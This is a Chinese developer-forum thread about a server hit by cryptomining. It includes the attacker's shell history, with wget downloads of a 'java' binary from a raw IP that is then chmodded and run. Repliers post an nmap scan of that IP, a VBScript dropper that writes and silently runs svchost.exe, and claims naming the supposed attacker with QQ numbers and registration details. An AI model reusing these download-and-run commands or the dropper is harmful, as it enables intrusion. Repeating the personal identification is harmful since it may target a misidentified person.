服务器连续两天被黑、第一次被挖矿、昨天又来、和第一次不同的是、居然有 history 记录、给各位老哥看看,只图一乐

2020-01-07 09:48:18 +08:00
 dothis

从 17:01 开始

为了防止上面图片挂掉、文本如下

21 2020-01-06 09:44:38 crontab -e

22 2020-01-06 09:45:16 reboot

23 2020-01-06 09:47:02 top

24 2020-01-06 17:01:03 top

25 2020-01-06 17:01:11 ls -l /proc/3557/exe

26 2020-01-06 17:01:17 netstat -atulnp

27 2020-01-06 17:01:40 ls -l /proc/1211/exe

28 2020-01-06 17:01:44 kill -9 1211

29 2020-01-06 17:01:46 crontab -l

30 2020-01-06 17:01:47 crontab -r

31 2020-01-06 17:01:48 crontab -l

32 2020-01-06 17:01:50 cd /usr/bin/

33 2020-01-06 17:01:57 rm -rf ftucwfvnpb

34 2020-01-06 17:02:00 netstat -atulnp

35 2020-01-06 17:02:03 w

36 2020-01-06 17:02:05 cd /root/

37 2020-01-06 17:02:07 cd /bin/

38 2020-01-06 17:02:15 wget http://101.201.76.232:8082/java

39 2020-01-06 17:02:19 rm -rf java.1

40 2020-01-06 17:02:20 cd /root/

41 2020-01-06 17:02:21 cd /opt/

42 2020-01-06 17:02:31 wget http://101.201.76.232:8082/java

43 2020-01-06 17:02:35 chmod 777 java

44 2020-01-06 17:02:36 ./java

45 2020-01-06 17:02:38 cd /root/

46 2020-01-06 17:02:41 ps -xua

47 2020-01-06 17:03:28 netstat -atulnp

48 2020-01-06 17:03:47 kill -9 4689

49 2020-01-06 17:03:51 netstat -atulnp

50 2020-01-06 17:04:02 cd /etc/

51 2020-01-06 17:04:11 kill -9 6161;kill -9 6163

52 2020-01-06 17:04:15 rm -rf java

53 2020-01-06 17:04:16 cd /root/

54 2020-01-06 17:04:17 cd /bin/

55 2020-01-06 17:04:22 wget http://101.201.76.232:8082/java

56 2020-01-06 17:04:28 rm -rf java.1

57 2020-01-06 17:04:30 cd /root/

58 2020-01-06 17:04:31 cd /opt/

59 2020-01-06 17:04:33 wget http://101.201.76.232:8082/java

60 2020-01-06 17:04:36 chmod 777 java

61 2020-01-06 17:04:39 ./java

62 2020-01-06 17:04:42 cd /root/

63 2020-01-06 17:04:44 netstat -atulnp

64 2020-01-06 17:04:51 ifconfig

65 2020-01-06 17:04:54 history

66 2020-01-06 17:05:01 netstat -atulnp

67 2020-01-06 17:05:42 cd /ro

68 2020-01-06 17:05:43 cd /root/

69 2020-01-06 17:05:46 history

70 2020-01-06 17:05:53 ifconfig

71 2020-01-06 17:05:54 history

72 2020-01-06 17:05:58 w

73 2020-01-06 17:06:00 history

74 2020-01-06 17:06:24 ifconfig

75 2020-01-06 17:06:27 history

76 2020-01-06 17:06:29 history

77 2020-01-06 17:06:29 history

24847 次点击
所在节点    程序员
66 条回复
songco
2020-01-07 15:16:55 +08:00
Starting Nmap ( https://nmap.org ) at 2020-01-07 09:14 EET
NSE: Loaded 40 scripts for scanning.
Initiating Ping Scan at 09:14
Scanning 101.201.76.232 [4 ports]
Completed Ping Scan at 09:14, 0.47s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:14
Scanning 101.201.76.232 [100 ports]
Discovered open port 1025/tcp on 101.201.76.232
Discovered open port 139/tcp on 101.201.76.232
Discovered open port 135/tcp on 101.201.76.232
Discovered open port 80/tcp on 101.201.76.232
Discovered open port 3389/tcp on 101.201.76.232
Discovered open port 1027/tcp on 101.201.76.232
Discovered open port 1026/tcp on 101.201.76.232
Completed SYN Stealth Scan at 09:14, 2.94s elapsed (100 total ports)
Initiating Service scan at 09:14
Scanning 7 services on 101.201.76.232
Completed Service scan at 09:15, 59.26s elapsed (7 services on 1 host)
NSE: Script scanning 101.201.76.232.
Initiating NSE at 09:15
Completed NSE at 09:15, 2.96s elapsed
Initiating NSE at 09:15
Completed NSE at 09:15, 0.00s elapsed
Nmap scan report for 101.201.76.232
Host is up (0.21s latency).
Not shown: 77 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.9.12
81/tcp filtered hosts2-ns
111/tcp filtered rpcbind
119/tcp filtered nntp
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
427/tcp filtered svrloc
445/tcp filtered microsoft-ds
515/tcp filtered printer
646/tcp filtered ldp
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1029/tcp filtered ms-lsa
3389/tcp open ms-wbt-server Microsoft Terminal Service
4899/tcp filtered radmin
5000/tcp filtered upnp
5101/tcp filtered admdog
5357/tcp filtered wsdapi
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6001/tcp filtered X11:1
49152/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.38 seconds
Raw packets sent: 182 (7.984KB) | Rcvd: 137 (5.516KB)
randomtree451
2020-01-07 15:30:07 +08:00
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ""
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
tengyoubiao
2020-01-07 15:50:25 +08:00
这是挂了个感染 HTML 的木马?
Achiii
2020-01-07 16:43:09 +08:00
试过被利用 tp 漏洞挂马,后来过滤 post 参数关键字解决的
black11black
2020-01-07 21:23:08 +08:00
老哥,说一下你这个查看用户历史记录的命令是啥呗
wqshare
2020-01-07 21:31:36 +08:00
看看这老哥的 80 端口页,用 vbs 挂了个马上去,哈哈
xupefei
2020-01-07 21:44:37 +08:00
不要对公网开 yarn 端口
rootx
2020-01-07 22:11:35 +08:00
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ""
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
dorothyREN
2020-01-08 00:55:30 +08:00
@dothis #37 数据库没备份,只有日志,恢复起来贼特么慢,搞了两天才恢复完数据
msg7086
2020-01-08 01:46:06 +08:00
公司服务器装宝塔?佩服佩服。
HTSdTt3WygdgQQGe
2020-01-08 02:12:03 +08:00
你马上报案,说数据库丢了价值一个亿的机密资料,让阿里去查
vvqqdd
2020-01-08 04:11:58 +08:00
这个服务器有个图片,点开是哥🐎,名字叫做 nknmn。。。顾名思义 哈哈
KasuganoSoras
2020-01-08 04:56:49 +08:00
在他的服务器上看到一张图片叫 “战鹰部落 MC 服务器”,正好我也是开 MC 服务器的,好奇搜了一下,找到了他们的服务器,QQ 群是 139888565,群主 QQ 是 565621504,昵称叫 NullPointerException,结合前面执行的命令以及文件名里面都含有 Java,我觉得八九不离十,楼主有兴趣可以自己去会会他?
KasuganoSoras
2020-01-08 05:04:08 +08:00
https://www.mcbbs.net/thread-675592-1-1.html
2017 年的时候曾经在我的世界中文论坛发过贴说自己的服务器被 DDoS 了 9.6Gbps 流量,然后从他的个人空间找到一个域名 www.zhanyingwl.com ,打开发现 502,是 360 云盾的界面,然后我想了下既然是用的 360 CDN,那这域名肯定有备案吧。然后又去查了一下备案号,果然。
尹伊君 个人 鲁 ICP 备 18039840 号-1 战鹰网络技术站 www.zhanyingwl.com
只能帮你到这里了(笑
cydian
2020-01-08 06:12:17 +08:00
@KasuganoSoras 可以打开 不是 502
webshe11
2020-01-08 08:17:53 +08:00
真就用宝塔呗
Pzqqt
2020-01-08 08:58:35 +08:00
@xmi 参考 38 楼 病毒是藏在页面源码里的 在页面源码下方有一段恶意 VBScript 代码 可以看出这段代码只对 Windows 系统有影响
dothis
2020-01-08 08:58:44 +08:00
@black11black 终端下直接敲 history 就可以看
@msg7086 我自己服务器用的、感觉贼舒服、然后公司的服务器也想用、最后没用起来就凉了、以后不敢用这些东西了、自己玩玩还行
@dorothyREN。。。这就很难受了、我这边有快照、简单很多
@KasuganoSoras 卧槽、老哥稳、多谢了
qanniu
2020-01-08 08:59:19 +08:00
@KasuganoSoras 大佬 v5
xiaoxiongmao
2020-01-08 09:14:18 +08:00
@KasuganoSoras 厉害了老哥

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/635675

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX